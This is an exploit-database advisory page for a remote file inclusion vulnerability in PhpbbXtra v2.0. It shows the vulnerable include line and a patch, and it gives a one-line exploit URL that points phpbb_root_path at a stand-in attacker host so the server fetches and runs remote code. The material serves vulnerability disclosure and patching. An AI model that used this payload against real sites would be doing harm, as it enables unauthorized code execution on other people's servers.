Advertisement






PhpbbXtra v2.0 (phpbb_root_path) Remote File Include Vulnerability

CVE Category Price Severity
N/A CWE-94 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2007-01-05
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006120133

Below is a copy:

-----------------------------------------------

PhpbbXtra v2.0 (phpbb_root_path) Remote File Include Vulnerability

-----------------------------------------------

Author: xoron

-----------------------------------------------
 
Vuln Code: include($phpbb_root_path . 'includes/bbcode.'.$phpEx);

-----------------------------------------------

F!X:

-open /includes/archive/archive_topic.php this file

-write this code before vuln. code

if ( !defined('IN_PHPBB') )
{
    die('Hacking attempt');
}

- save and exit

-----------------------------------------------

exploit:

http://www.[target].com/[script_path]/includes/archive/archive_topic.php
?phpbb_root_path=http://evil_scripts ?

-----------------------------------------------

download:http://sourceforge.net/project/showfiles.php?group_id=152219

-----------------------------------------------
XORON   -   XORON   -   XORON   -   XORON   -   XORON
-----------------------------------------------------------
-                                                         -
-                                                         -
- Tum muslumanlar.n kurban bayram. simdiden mubarek olsun -
-                                                         -
-                                                         -
-----------------------------------------------------------

# milw0rm.com [2006-12-25]

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum